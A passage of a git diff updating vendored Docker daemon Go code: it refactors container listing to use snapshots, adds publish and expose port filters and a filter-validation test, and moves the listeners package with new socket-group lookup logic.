-	if err := d.migrateLegacySqliteLinks(db, c1); err != nil {
-		t.Fatal(err)
-	}
-
-	if len(c1.HostConfig.Links) != 1 {
-		t.Fatal("expected links to be populated but is empty")
-	}
-
-	expected := name2 + ":" + alias
-	actual := c1.HostConfig.Links[0]
-	if actual != expected {
-		t.Fatalf("got wrong link value, expected: %q, got: %q", expected, actual)
-	}
-
-	// ensure this is persisted
-	b, err := ioutil.ReadFile(filepath.Join(c1.Root, "hostconfig.json"))
-	if err != nil {
-		t.Fatal(err)
-	}
-	type hc struct {
-		Links []string
-	}
-	var cfg hc
-	if err := json.Unmarshal(b, &cfg); err != nil {
-		t.Fatal(err)
-	}
-
-	if len(cfg.Links) != 1 {
-		t.Fatalf("expected one entry in links, got: %d", len(cfg.Links))
-	}
-	if cfg.Links[0] != expected { // same expected as above
-		t.Fatalf("got wrong link value, expected: %q, got: %q", expected, cfg.Links[0])
-	}
-}
diff --git a/vendor/github.com/docker/docker/daemon/links_notlinux.go b/vendor/github.com/docker/docker/daemon/links_notlinux.go
deleted file mode 100644
index 12c226cfac..0000000000
--- a/vendor/github.com/docker/docker/daemon/links_notlinux.go
+++ /dev/null
@@ -1,10 +0,0 @@
-// +build !linux
-
-package daemon
-
-import "github.com/docker/docker/container"
-
-// sqliteMigration performs the link graph DB migration. No-op on platforms other than Linux
-func (daemon *Daemon) sqliteMigration(_ map[string]*container.Container) error {
-	return nil
-}
diff --git a/vendor/github.com/docker/docker/daemon/list.go b/vendor/github.com/docker/docker/daemon/list.go
index 02805ea62b..750079f966 100644
--- a/vendor/github.com/docker/docker/daemon/list.go
+++ b/vendor/github.com/docker/docker/daemon/list.go
@@ -1,29 +1,22 @@
-package daemon
+package daemon // import "github.com/docker/docker/daemon"
 
 import (
-	"errors"
 	"fmt"
 	"sort"
 	"strconv"
 	"strings"
 
-	"github.com/Sirupsen/logrus"
 	"github.com/docker/docker/api/types"
 	"github.com/docker/docker/api/types/filters"
-	networktypes "github.com/docker/docker/api/types/network"
 	"github.com/docker/docker/container"
+	"github.com/docker/docker/daemon/images"
+	"github.com/docker/docker/errdefs"
 	"github.com/docker/docker/image"
-	"github.com/docker/docker/volume"
 	"github.com/docker/go-connections/nat"
+	"github.com/pkg/errors"
+	"github.com/sirupsen/logrus"
 )
 
-var acceptedVolumeFilterTags = map[string]bool{
-	"dangling": true,
-	"name":     true,
-	"driver":   true,
-	"label":    true,
-}
-
 var acceptedPsFilterTags = map[string]bool{
 	"ancestor":  true,
 	"before":    true,
@@ -38,6 +31,8 @@ var acceptedPsFilterTags = map[string]bool{
 	"volume":    true,
 	"network":   true,
 	"is-task":   true,
+	"publish":   true,
+	"expose":    true,
 }
 
 // iterationAction represents possible outcomes happening during the container iteration.
@@ -45,7 +40,7 @@ type iterationAction int
 
 // containerReducer represents a reducer for a container.
 // Returns the object to serialize by the api.
-type containerReducer func(*container.Container, *listContext) (*types.Container, error)
+type containerReducer func(*container.Snapshot, *listContext) (*types.Container, error)
 
 const (
 	// includeContainer is the action to include a container in the reducer.
@@ -81,33 +76,39 @@ type listContext struct {
 	exitAllowed []int
 
 	// beforeFilter is a filter to ignore containers that appear before the one given
-	beforeFilter *container.Container
+	beforeFilter *container.Snapshot
 	// sinceFilter is a filter to stop the filtering when the iterator arrive to the given container
-	sinceFilter *container.Container
+	sinceFilter *container.Snapshot
 
 	// taskFilter tells if we should filter based on wether a container is part of a task
 	taskFilter bool
 	// isTask tells us if the we should filter container that are a task (true) or not (false)
 	isTask bool
+
+	// publish is a list of published ports to filter with
+	publish map[nat.Port]bool
+	// expose is a list of exposed ports to filter with
+	expose map[nat.Port]bool
+
 	// ContainerListOptions is the filters set by the user
 	*types.ContainerListOptions
 }
 
-// byContainerCreated is a temporary type used to sort a list of containers by creation time.
-type byContainerCreated []*container.Container
+// byCreatedDescending is a temporary type used to sort a list of containers by creation time.
+type byCreatedDescending []container.Snapshot
 
-func (r byContainerCreated) Len() int      { return len(r) }
-func (r byContainerCreated) Swap(i, j int) { r[i], r[j] = r[j], r[i] }
-func (r byContainerCreated) Less(i, j int) bool {
-	return r[i].Created.UnixNano() < r[j].Created.UnixNano()
+func (r byCreatedDescending) Len() int      { return len(r) }
+func (r byCreatedDescending) Swap(i, j int) { r[i], r[j] = r[j], r[i] }
+func (r byCreatedDescending) Less(i, j int) bool {
+	return r[j].CreatedAt.UnixNano() < r[i].CreatedAt.UnixNano()
 }
 
 // Containers returns the list of containers to show given the user's filtering.
 func (daemon *Daemon) Containers(config *types.ContainerListOptions) ([]*types.Container, error) {
-	return daemon.reduceContainers(config, daemon.transformContainer)
+	return daemon.reduceContainers(config, daemon.refreshImage)
 }
 
-func (daemon *Daemon) filterByNameIDMatches(ctx *listContext) []*container.Container {
+func (daemon *Daemon) filterByNameIDMatches(view container.View, ctx *listContext) ([]container.Snapshot, error) {
 	idSearch := false
 	names := ctx.filters.Get("name")
 	ids := ctx.filters.Get("id")
@@ -115,7 +116,9 @@ func (daemon *Daemon) filterByNameIDMatches(ctx *listContext) []*container.Conta
 		// if name or ID filters are not in use, return to
 		// standard behavior of walking the entire container
 		// list from the daemon's in-memory store
-		return daemon.List()
+		all, err := view.All()
+		sort.Sort(byCreatedDescending(all))
+		return all, err
 	}
 
 	// idSearch will determine if we limit name matching to the IDs
@@ -150,38 +153,52 @@ func (daemon *Daemon) filterByNameIDMatches(ctx *listContext) []*container.Conta
 		}
 	}
 
-	cntrs := make([]*container.Container, 0, len(matches))
+	cntrs := make([]container.Snapshot, 0, len(matches))
 	for id := range matches {
-		if c := daemon.containers.Get(id); c != nil {
-			cntrs = append(cntrs, c)
+		c, err := view.Get(id)
+		switch err.(type) {
+		case nil:
+			cntrs = append(cntrs, *c)
+		case container.NoSuchContainerError:
+			// ignore error
+		default:
+			return nil, err
 		}
 	}
 
 	// Restore sort-order after filtering
 	// Created gives us nanosec resolution for sorting
-	sort.Sort(sort.Reverse(byContainerCreated(cntrs)))
+	sort.Sort(byCreatedDescending(cntrs))
 
-	return cntrs
+	return cntrs, nil
 }
 
 // reduceContainers parses the user's filtering options and generates the list of containers to return based on a reducer.
 func (daemon *Daemon) reduceContainers(config *types.ContainerListOptions, reducer containerReducer) ([]*types.Container, error) {
+	if err := config.Filters.Validate(acceptedPsFilterTags); err != nil {
+		return nil, err
+	}
+
 	var (
+		view       = daemon.containersReplica.Snapshot()
 		containers = []*types.Container{}
 	)
 
-	ctx, err := daemon.foldFilter(config)
+	ctx, err := daemon.foldFilter(view, config)
 	if err != nil {
 		return nil, err
 	}
 
 	// fastpath to only look at a subset of containers if specific name
 	// or ID matches were provided by the user--otherwise we potentially
-	// end up locking and querying many more containers than intended
-	containerList := daemon.filterByNameIDMatches(ctx)
+	// end up querying many more containers than intended
+	containerList, err := daemon.filterByNameIDMatches(view, ctx)
+	if err != nil {
+		return nil, err
+	}
 
-	for _, container := range containerList {
-		t, err := daemon.reducePsContainer(container, ctx, reducer)
+	for i := range containerList {
+		t, err := daemon.reducePsContainer(&containerList[i], ctx, reducer)
 		if err != nil {
 			if err != errStopIteration {
 				return nil, err
@@ -198,13 +215,9 @@ func (daemon *Daemon) reduceContainers(config *types.ContainerListOptions, reduc
 }
 
 // reducePsContainer is the basic representation for a container as expected by the ps command.
-func (daemon *Daemon) reducePsContainer(container *container.Container, ctx *listContext, reducer containerReducer) (*types.Container, error) {
-	container.Lock()
-	defer container.Unlock()
-
+func (daemon *Daemon) reducePsContainer(container *container.Snapshot, ctx *listContext, reducer containerReducer) (*types.Container, error) {
 	// filter containers to return
-	action := includeContainerInList(container, ctx)
-	switch action {
+	switch includeContainerInList(container, ctx) {
 	case excludeContainer:
 		return nil, nil
 	case stopIteration:
@@ -212,17 +225,24 @@ func (daemon *Daemon) reducePsContainer(container *container.Container, ctx *lis
 	}
 
 	// transform internal container struct into api structs
-	return reducer(container, ctx)
+	newC, err := reducer(container, ctx)
+	if err != nil {
+		return nil, err
+	}
+
+	// release lock because size calculation is slow
+	if ctx.Size {
+		sizeRw, sizeRootFs := daemon.imageService.GetContainerLayerSize(newC.ID)
+		newC.SizeRw = sizeRw
+		newC.SizeRootFs = sizeRootFs
+	}
+	return newC, nil
 }
 
 // foldFilter generates the container filter based on the user's filtering options.
-func (daemon *Daemon) foldFilter(config *types.ContainerListOptions) (*listContext, error) {
+func (daemon *Daemon) foldFilter(view container.View, config *types.ContainerListOptions) (*listContext, error) {
 	psFilters := config.Filters
 
-	if err := psFilters.Validate(acceptedPsFilterTags); err != nil {
-		return nil, err
-	}
-
 	var filtExited []int
 
 	err := psFilters.WalkValues("exited", func(value string) error {
@@ -239,7 +259,7 @@ func (daemon *Daemon) foldFilter(config *types.ContainerListOptions) (*listConte
 
 	err = psFilters.WalkValues("status", func(value string) error {
 		if !container.IsValidStateString(value) {
-			return fmt.Errorf("Unrecognised filter value for status: %s", value)
+			return invalidFilter{"status", value}
 		}
 
 		config.All = true
@@ -250,7 +270,7 @@ func (daemon *Daemon) foldFilter(config *types.ContainerListOptions) (*listConte
 	}
 
 	var taskFilter, isTask bool
-	if psFilters.Include("is-task") {
+	if psFilters.Contains("is-task") {
 		if psFilters.ExactMatch("is-task", "true") {
 			taskFilter = true
 			isTask = true
@@ -258,13 +278,13 @@ func (daemon *Daemon) foldFilter(config *types.ContainerListOptions) (*listConte
 			taskFilter = true
 			isTask = false
 		} else {
-			return nil, fmt.Errorf("Invalid filter 'is-task=%s'", psFilters.Get("is-task"))
+			return nil, invalidFilter{"is-task", psFilters.Get("is-task")}
 		}
 	}
 
 	err = psFilters.WalkValues("health", func(value string) error {
 		if !container.IsValidHealthString(value) {
-			return fmt.Errorf("Unrecognised filter value for health: %s", value)
+			return errdefs.InvalidParameter(errors.Errorf("Unrecognised filter value for health: %s", value))
 		}
 
 		return nil
@@ -273,10 +293,10 @@ func (daemon *Daemon) foldFilter(config *types.ContainerListOptions) (*listConte
 		return nil, err
 	}
 
-	var beforeContFilter, sinceContFilter *container.Container
+	var beforeContFilter, sinceContFilter *container.Snapshot
 
 	err = psFilters.WalkValues("before", func(value string) error {
-		beforeContFilter, err = daemon.GetContainer(value)
+		beforeContFilter, err = idOrNameFilter(view, value)
 		return err
 	})
 	if err != nil {
@@ -284,7 +304,7 @@ func (daemon *Daemon) foldFilter(config *types.ContainerListOptions) (*listConte
 	}
 
 	err = psFilters.WalkValues("since", func(value string) error {
-		sinceContFilter, err = daemon.GetContainer(value)
+		sinceContFilter, err = idOrNameFilter(view, value)
 		return err
 	})
 	if err != nil {
@@ -293,24 +313,36 @@ func (daemon *Daemon) foldFilter(config *types.ContainerListOptions) (*listConte
 
 	imagesFilter := map[image.ID]bool{}
 	var ancestorFilter bool
-	if psFilters.Include("ancestor") {
+	if psFilters.Contains("ancestor") {
 		ancestorFilter = true
 		psFilters.WalkValues("ancestor", func(ancestor string) error {
-			id, err := daemon.GetImageID(ancestor)
+			img, err := daemon.imageService.GetImage(ancestor)
 			if err != nil {
 				logrus.Warnf("Error while looking up for image %v", ancestor)
 				return nil
 			}
-			if imagesFilter[id] {
+			if imagesFilter[img.ID()] {
 				// Already seen this ancestor, skip it
 				return nil
 			}
 			// Then walk down the graph and put the imageIds in imagesFilter
-			populateImageFilterByParents(imagesFilter, id, daemon.imageStore.Children)
+			populateImageFilterByParents(imagesFilter, img.ID(), daemon.imageService.Children)
 			return nil
 		})
 	}
 
+	publishFilter := map[nat.Port]bool{}
+	err = psFilters.WalkValues("publish", portOp("publish", publishFilter))
+	if err != nil {
+		return nil, err
+	}
+
+	exposeFilter := map[nat.Port]bool{}
+	err = psFilters.WalkValues("expose", portOp("expose", exposeFilter))
+	if err != nil {
+		return nil, err
+	}
+
 	return &listContext{
 		filters:              psFilters,
 		ancestorFilter:       ancestorFilter,
@@ -320,14 +352,61 @@ func (daemon *Daemon) foldFilter(config *types.ContainerListOptions) (*listConte
 		sinceFilter:          sinceContFilter,
 		taskFilter:           taskFilter,
 		isTask:               isTask,
+		publish:              publishFilter,
+		expose:               exposeFilter,
 		ContainerListOptions: config,
-		names:                daemon.nameIndex.GetAll(),
+		names:                view.GetAllNames(),
 	}, nil
 }
 
+func idOrNameFilter(view container.View, value string) (*container.Snapshot, error) {
+	filter, err := view.Get(value)
+	switch err.(type) {
+	case container.NoSuchContainerError:
+		// Try name search instead
+		found := ""
+		for id, idNames := range view.GetAllNames() {
+			for _, eachName := range idNames {
+				if strings.TrimPrefix(value, "/") == strings.TrimPrefix(eachName, "/") {
+					if found != "" && found != id {
+						return nil, err
+					}
+					found = id
+				}
+			}
+		}
+		if found != "" {
+			filter, err = view.Get(found)
+		}
+	}
+	return filter, err
+}
+
+func portOp(key string, filter map[nat.Port]bool) func(value string) error {
+	return func(value string) error {
+		if strings.Contains(value, ":") {
+			return fmt.Errorf("filter for '%s' should not contain ':': %s", key, value)
+		}
+		//support two formats, original format <portnum>/[<proto>] or <startport-endport>/[<proto>]
+		proto, port := nat.SplitProtoPort(value)
+		start, end, err := nat.ParsePortRange(port)
+		if err != nil {
+			return fmt.Errorf("error while looking up for %s %s: %s", key, value, err)
+		}
+		for i := start; i <= end; i++ {
+			p, err := nat.NewPort(proto, strconv.FormatUint(i, 10))
+			if err != nil {
+				return fmt.Errorf("error while looking up for %s %s: %s", key, value, err)
+			}
+			filter[p] = true
+		}
+		return nil
+	}
+}
+
 // includeContainerInList decides whether a container should be included in the output or not based in the filter.
 // It also decides if the iteration should be stopped or not.
-func includeContainerInList(container *container.Container, ctx *listContext) iterationAction {
+func includeContainerInList(container *container.Snapshot, ctx *listContext) iterationAction {
 	// Do not include container if it's in the list before the filter container.
 	// Set the filter container to nil to include the rest of containers after this one.
 	if ctx.beforeFilter != nil {
@@ -366,7 +445,7 @@ func includeContainerInList(container *container.Container, ctx *listContext) it
 	}
 
 	// Do not include container if any of the labels don't match
-	if !ctx.filters.MatchKVList("label", container.Config.Labels) {
+	if !ctx.filters.MatchKVList("label", container.Labels) {
 		return excludeContainer
 	}
 
@@ -384,7 +463,7 @@ func includeContainerInList(container *container.Container, ctx *listContext) it
 	if len(ctx.exitAllowed) > 0 {
 		shouldSkip := true
 		for _, code := range ctx.exitAllowed {
-			if code == container.ExitCode() && !container.Running && !container.StartedAt.IsZero() {
+			if code == container.ExitCode && !container.Running && !container.StartedAt.IsZero() {
 				shouldSkip = false
 				break
 			}
@@ -395,28 +474,34 @@ func includeContainerInList(container *container.Container, ctx *listContext) it
 	}
 
 	// Do not include container if its status doesn't match the filter
-	if !ctx.filters.Match("status", container.State.StateString()) {
+	if !ctx.filters.Match("status", container.State) {
 		return excludeContainer
 	}
 
 	// Do not include container if its health doesn't match the filter
-	if !ctx.filters.ExactMatch("health", container.State.HealthString()) {
+	if !ctx.filters.ExactMatch("health", container.Health) {
 		return excludeContainer
 	}
 
-	if ctx.filters.Include("volume") {
-		volumesByName := make(map[string]*volume.MountPoint)
-		for _, m := range container.MountPoints {
+	if ctx.filters.Contains("volume") {
+		volumesByName := make(map[string]types.MountPoint)
+		for _, m := range container.Mounts {
 			if m.Name != "" {
 				volumesByName[m.Name] = m
 			} else {
 				volumesByName[m.Source] = m
 			}
 		}
+		volumesByDestination := make(map[string]types.MountPoint)
+		for _, m := range container.Mounts {
+			if m.Destination != "" {
+				volumesByDestination[m.Destination] = m
+			}
+		}
 
 		volumeExist := fmt.Errorf("volume mounted in container")
 		err := ctx.filters.WalkValues("volume", func(value string) error {
-			if _, exist := container.MountPoints[value]; exist {
+			if _, exist := volumesByDestination[value]; exist {
 				return volumeExist
 			}
 			if _, exist := volumesByName[value]; exist {
@@ -433,22 +518,28 @@ func includeContainerInList(container *container.Container, ctx *listContext) it
 		if len(ctx.images) == 0 {
 			return excludeContainer
 		}
-		if !ctx.images[container.ImageID] {
+		if !ctx.images[image.ID(container.ImageID)] {
 			return excludeContainer
 		}
 	}
 
-	networkExist := fmt.Errorf("container part of network")
-	if ctx.filters.Include("network") {
+	var (
+		networkExist = errors.New("container part of network")
+		noNetworks   = errors.New("container is not part of any networks")
+	)
+	if ctx.filters.Contains("network") {
 		err := ctx.filters.WalkValues("network", func(value string) error {
+			if container.NetworkSettings == nil {
+				return noNetworks
+			}
 			if _, ok := container.NetworkSettings.Networks[value]; ok {
 				return networkExist
 			}
 			for _, nw := range container.NetworkSettings.Networks {
-				if nw.EndpointSettings == nil {
+				if nw == nil {
 					continue
 				}
-				if nw.NetworkID == value {
+				if strings.HasPrefix(nw.NetworkID, value) {
 					return networkExist
 				}
 			}
@@ -459,195 +550,51 @@ func includeContainerInList(container *container.Container, ctx *listContext) it
 		}
 	}
 
-	return includeContainer
-}
-
-// transformContainer generates the container type expected by the docker ps command.
-func (daemon *Daemon) transformContainer(container *container.Container, ctx *listContext) (*types.Container, error) {
-	newC := &types.Container{
-		ID:      container.ID,
-		Names:   ctx.names[container.ID],
-		ImageID: container.ImageID.String(),
-	}
-	if newC.Names == nil {
-		// Dead containers will often have no name, so make sure the response isn't null
-		newC.Names = []string{}
-	}
-
-	image := container.Config.Image // if possible keep the original ref
-	if image != container.ImageID.String() {
-		id, err := daemon.GetImageID(image)
-		if _, isDNE := err.(ErrImageDoesNotExist); err != nil && !isDNE {
-			return nil, err
-		}
-		if err != nil || id != container.ImageID {
-			image = container.ImageID.String()
-		}
-	}
-	newC.Image = image
-
-	if len(container.Args) > 0 {
-		args := []string{}
-		for _, arg := range container.Args {
-			if strings.Contains(arg, " ") {
-				args = append(args, fmt.Sprintf("'%s'", arg))
-			} else {
-				args = append(args, arg)
+	if len(ctx.publish) > 0 {
+		shouldSkip := true
+		for port := range ctx.publish {
+			if _, ok := container.PortBindings[port]; ok {
+				shouldSkip = false
+				break
 			}
 		}
-		argsAsString := strings.Join(args, " ")
-
-		newC.Command = fmt.Sprintf("%s %s", container.Path, argsAsString)
-	} else {
-		newC.Command = container.Path
-	}
-	newC.Created = container.Created.Unix()
-	newC.State = container.State.StateString()
-	newC.Status = container.State.String()
-	newC.HostConfig.NetworkMode = string(container.HostConfig.NetworkMode)
-	// copy networks to avoid races
-	networks := make(map[string]*networktypes.EndpointSettings)
-	for name, network := range container.NetworkSettings.Networks {
-		if network == nil || network.EndpointSettings == nil {
-			continue
-		}
-		networks[name] = &networktypes.EndpointSettings{
-			EndpointID:          network.EndpointID,
-			Gateway:             network.Gateway,
-			IPAddress:           network.IPAddress,
-			IPPrefixLen:         network.IPPrefixLen,
-			IPv6Gateway:         network.IPv6Gateway,
-			GlobalIPv6Address:   network.GlobalIPv6Address,
-			GlobalIPv6PrefixLen: network.GlobalIPv6PrefixLen,
-			MacAddress:          network.MacAddress,
-			NetworkID:           network.NetworkID,
-		}
-		if network.IPAMConfig != nil {
-			networks[name].IPAMConfig = &networktypes.EndpointIPAMConfig{
-				IPv4Address: network.IPAMConfig.IPv4Address,
-				IPv6Address: network.IPAMConfig.IPv6Address,
-			}
+		if shouldSkip {
+			return excludeContainer
 		}
 	}
-	newC.NetworkSettings = &types.SummaryNetworkSettings{Networks: networks}
 
-	newC.Ports = []types.Port{}
-	for port, bindings := range container.NetworkSettings.Ports {
-		p, err := nat.ParsePort(port.Port())
-		if err != nil {
-			return nil, err
-		}
-		if len(bindings) == 0 {
-			newC.Ports = append(newC.Ports, types.Port{
-				PrivatePort: uint16(p),
-				Type:        port.Proto(),
-			})
-			continue
-		}
-		for _, binding := range bindings {
-			h, err := nat.ParsePort(binding.HostPort)
-			if err != nil {
-				return nil, err
+	if len(ctx.expose) > 0 {
+		shouldSkip := true
+		for port := range ctx.expose {
+			if _, ok := container.ExposedPorts[port]; ok {
+				shouldSkip = false
+				break
 			}
-			newC.Ports = append(newC.Ports, types.Port{
-				PrivatePort: uint16(p),
-				PublicPort:  uint16(h),
-				Type:        port.Proto(),
-				IP:          binding.HostIP,
-			})
 		}
-	}
-
-	if ctx.Size {
-		sizeRw, sizeRootFs := daemon.getSize(container)
-		newC.SizeRw = sizeRw
-		newC.SizeRootFs = sizeRootFs
-	}
-	newC.Labels = container.Config.Labels
-	newC.Mounts = addMountPoints(container)
-
-	return newC, nil
-}
-
-// Volumes lists known volumes, using the filter to restrict the range
-// of volumes returned.
-func (daemon *Daemon) Volumes(filter string) ([]*types.Volume, []string, error) {
-	var (
-		volumesOut []*types.Volume
-	)
-	volFilters, err := filters.FromParam(filter)
-	if err != nil {
-		return nil, nil, err
-	}
-
-	if err := volFilters.Validate(acceptedVolumeFilterTags); err != nil {
-		return nil, nil, err
-	}
-
-	volumes, warnings, err := daemon.volumes.List()
-	if err != nil {
-		return nil, nil, err
-	}
-
-	filterVolumes, err := daemon.filterVolumes(volumes, volFilters)
-	if err != nil {
-		return nil, nil, err
-	}
-	for _, v := range filterVolumes {
-		apiV := volumeToAPIType(v)
-		if vv, ok := v.(interface {
-			CachedPath() string
-		}); ok {
-			apiV.Mountpoint = vv.CachedPath()
-		} else {
-			apiV.Mountpoint = v.Path()
+		if shouldSkip {
+			return excludeContainer
 		}
-		volumesOut = append(volumesOut, apiV)
 	}
-	return volumesOut, warnings, nil
-}
 
-// filterVolumes filters volume list according to user specified filter
-// and returns user chosen volumes
-func (daemon *Daemon) filterVolumes(vols []volume.Volume, filter filters.Args) ([]volume.Volume, error) {
-	// if filter is empty, return original volume list
-	if filter.Len() == 0 {
-		return vols, nil
-	}
+	return includeContainer
+}
 
-	var retVols []volume.Volume
-	for _, vol := range vols {
-		if filter.Include("name") {
-			if !filter.Match("name", vol.Name()) {
-				continue
-			}
-		}
-		if filter.Include("driver") {
-			if !filter.Match("driver", vol.DriverName()) {
-				continue
-			}
-		}
-		if filter.Include("label") {
-			v, ok := vol.(volume.DetailedVolume)
-			if !ok {
-				continue
-			}
-			if !filter.MatchKVList("label", v.Labels()) {
-				continue
-			}
+// refreshImage checks if the Image ref still points to the correct ID, and updates the ref to the actual ID when it doesn't
+func (daemon *Daemon) refreshImage(s *container.Snapshot, ctx *listContext) (*types.Container, error) {
+	c := s.Container
+	image := s.Image // keep the original ref if still valid (hasn't changed)
+	if image != s.ImageID {
+		img, err := daemon.imageService.GetImage(image)
+		if _, isDNE := err.(images.ErrImageDoesNotExist); err != nil && !isDNE {
+			return nil, err
 		}
-		retVols = append(retVols, vol)
-	}
-	danglingOnly := false
-	if filter.Include("dangling") {
-		if filter.ExactMatch("dangling", "true") || filter.ExactMatch("dangling", "1") {
-			danglingOnly = true
-		} else if !filter.ExactMatch("dangling", "false") && !filter.ExactMatch("dangling", "0") {
-			return nil, fmt.Errorf("Invalid filter 'dangling=%s'", filter.Get("dangling"))
+		if err != nil || img.ImageID() != s.ImageID {
+			// ref changed, we need to use original ID
+			image = s.ImageID
 		}
-		retVols = daemon.volumes.FilterByUsed(retVols, !danglingOnly)
 	}
-	return retVols, nil
+	c.Image = image
+	return &c, nil
 }
 
 func populateImageFilterByParents(ancestorMap map[image.ID]bool, imageID image.ID, getChildren func(image.ID) []image.ID) {
diff --git a/vendor/github.com/docker/docker/daemon/list_test.go b/vendor/github.com/docker/docker/daemon/list_test.go
new file mode 100644
index 0000000000..3be510d13d
--- /dev/null
+++ b/vendor/github.com/docker/docker/daemon/list_test.go
@@ -0,0 +1,26 @@
+package daemon
+
+import (
+	"testing"
+
+	"github.com/docker/docker/api/types"
+	"github.com/docker/docker/api/types/filters"
+	"github.com/docker/docker/container"
+	"gotest.tools/assert"
+	is "gotest.tools/assert/cmp"
+)
+
+func TestListInvalidFilter(t *testing.T) {
+	db, err := container.NewViewDB()
+	assert.Assert(t, err == nil)
+	d := &Daemon{
+		containersReplica: db,
+	}
+
+	f := filters.NewArgs(filters.Arg("invalid", "foo"))
+
+	_, err = d.Containers(&types.ContainerListOptions{
+		Filters: f,
+	})
+	assert.Assert(t, is.Error(err, "Invalid filter 'invalid'"))
+}
diff --git a/vendor/github.com/docker/docker/daemon/list_unix.go b/vendor/github.com/docker/docker/daemon/list_unix.go
index 91c9caccf4..4f9e453bc2 100644
--- a/vendor/github.com/docker/docker/daemon/list_unix.go
+++ b/vendor/github.com/docker/docker/daemon/list_unix.go
@@ -1,11 +1,11 @@
-// +build linux freebsd solaris
+// +build linux freebsd
 
-package daemon
+package daemon // import "github.com/docker/docker/daemon"
 
 import "github.com/docker/docker/container"
 
 // excludeByIsolation is a platform specific helper function to support PS
 // filtering by Isolation. This is a Windows-only concept, so is a no-op on Unix.
-func excludeByIsolation(container *container.Container, ctx *listContext) iterationAction {
+func excludeByIsolation(container *container.Snapshot, ctx *listContext) iterationAction {
 	return includeContainer
 }
diff --git a/vendor/github.com/docker/docker/daemon/list_windows.go b/vendor/github.com/docker/docker/daemon/list_windows.go
index 7fbcd3af26..7c7b5fa856 100644
--- a/vendor/github.com/docker/docker/daemon/list_windows.go
+++ b/vendor/github.com/docker/docker/daemon/list_windows.go
@@ -1,4 +1,4 @@
-package daemon
+package daemon // import "github.com/docker/docker/daemon"
 
 import (
 	"strings"
@@ -8,7 +8,7 @@ import (
 
 // excludeByIsolation is a platform specific helper function to support PS
 // filtering by Isolation. This is a Windows-only concept, so is a no-op on Unix.
-func excludeByIsolation(container *container.Container, ctx *listContext) iterationAction {
+func excludeByIsolation(container *container.Snapshot, ctx *listContext) iterationAction {
 	i := strings.ToLower(string(container.HostConfig.Isolation))
 	if i == "" {
 		i = "default"
diff --git a/vendor/github.com/docker/docker/daemon/listeners/group_unix.go b/vendor/github.com/docker/docker/daemon/listeners/group_unix.go
new file mode 100644
index 0000000000..9cc17eba7b
--- /dev/null
+++ b/vendor/github.com/docker/docker/daemon/listeners/group_unix.go
@@ -0,0 +1,34 @@
+// +build !windows
+
+package listeners // import "github.com/docker/docker/daemon/listeners"
+
+import (
+	"fmt"
+	"strconv"
+
+	"github.com/opencontainers/runc/libcontainer/user"
+	"github.com/pkg/errors"
+)
+
+const defaultSocketGroup = "docker"
+
+func lookupGID(name string) (int, error) {
+	groupFile, err := user.GetGroupPath()
+	if err != nil {
+		return -1, errors.Wrap(err, "error looking up groups")
+	}
+	groups, err := user.ParseGroupFileFilter(groupFile, func(g user.Group) bool {
+		return g.Name == name || strconv.Itoa(g.Gid) == name
+	})
+	if err != nil {
+		return -1, errors.Wrapf(err, "error parsing groups for %s", name)
+	}
+	if len(groups) > 0 {
+		return groups[0].Gid, nil
+	}
+	gid, err := strconv.Atoi(name)
+	if err == nil {
+		return gid, nil
+	}
+	return -1, fmt.Errorf("group %s not found", name)
+}
diff --git a/vendor/github.com/docker/docker/pkg/listeners/listeners_unix.go b/vendor/github.com/docker/docker/daemon/listeners/listeners_linux.go
similarity index 75%
rename from vendor/github.com/docker/docker/pkg/listeners/listeners_unix.go
rename to vendor/github.com/docker/docker/daemon/listeners/listeners_linux.go
index 1bcae7aa3e..c8956db258 100644
--- a/vendor/github.com/docker/docker/pkg/listeners/listeners_unix.go
+++ b/vendor/github.com/docker/docker/daemon/listeners/listeners_linux.go
@@ -1,16 +1,15 @@
-// +build !windows,!solaris
-
-package listeners
+package listeners // import "github.com/docker/docker/daemon/listeners"
 
 import (
 	"crypto/tls"
 	"fmt"
 	"net"
+	"os"
 	"strconv"
 
-	"github.com/Sirupsen/logrus"
 	"github.com/coreos/go-systemd/activation"
 	"github.com/docker/go-connections/sockets"
+	"github.com/sirupsen/logrus"
 )
 
 // Init creates new listeners for the server.
@@ -32,7 +31,17 @@ func Init(proto, addr, socketGroup string, tlsConfig *tls.Config) ([]net.Listene
 		}
 		ls = append(ls, l)
 	case "unix":
-		l, err := sockets.NewUnixSocket(addr, socketGroup)
+		gid, err := lookupGID(socketGroup)
+		if err != nil {
+			if socketGroup != "" {
+				if socketGroup != defaultSocketGroup {
+					return nil, err
+				}
+				logrus.Warnf("could not change group %s to %s: %v", addr, defaultSocketGroup, err)
+			}
+			gid = os.Getgid()
+		}
+		l, err := sockets.NewUnixSocket(addr, gid)
 		if err != nil {
 			return nil, fmt.Errorf("can't create unix socket %s: %v", addr, err)
 		}
@@ -53,9 +62,9 @@ func listenFD(addr string, tlsConfig *tls.Config) ([]net.Listener, error) {
 	)
 	// socket activation
 	if tlsConfig != nil {
-		listeners, err = activation.TLSListeners(false, tlsConfig)
+		listeners, err = activation.TLSListeners(tlsConfig)
 	} else {
-		listeners, err = activation.Listeners(false)
+		listeners, err = activation.Listeners()
 	}
 	if err != nil {
 		return nil, err
@@ -75,7 +84,7 @@ func listenFD(addr string, tlsConfig *tls.Config) ([]net.Listener, error) {
 		return nil, fmt.Errorf("failed to parse systemd fd address: should be a number: %v", addr)
 	}
 	fdOffset := fdNum - 3
-	if len(listeners) < int(fdOffset)+1 {
+	if len(listeners) < fdOffset+1 {
 		return nil, fmt.Errorf("too few socket activated files passed in by systemd")
 	}
 	if listeners[fdOffset] == nil {
@@ -86,8 +95,7 @@ func listenFD(addr string, tlsConfig *tls.Config) ([]net.Listener, error) {
 			continue
 		}
 		if err := ls.Close(); err != nil {
-			// TODO: We shouldn't log inside a library. Remove this or error out.
-			logrus.Errorf("failed to close systemd activated file: fd %d: %v", fdOffset+3, err)
+			return nil, fmt.Errorf("failed to close systemd activated file: fd %d: %v", fdOffset+3, err)
 		}
 	}
 	return []net.Listener{listeners[fdOffset]}, nil
diff --git a/vendor/github.com/docker/docker/pkg/listeners/listeners_windows.go b/vendor/github.com/docker/docker/daemon/listeners/listeners_windows.go
similarity index 94%
rename from vendor/github.com/docker/docker/pkg/listeners/listeners_windows.go
rename to vendor/github.com/docker/docker/daemon/listeners/listeners_windows.go
index 5b5a470fc6..73f5f79e4b 100644
--- a/vendor/github.com/docker/docker/pkg/listeners/listeners_windows.go
+++ b/vendor/github.com/docker/docker/daemon/listeners/listeners_windows.go
@@ -1,4 +1,4 @@
-package listeners
+package listeners // import "github.com/docker/docker/daemon/listeners"
 
 import (
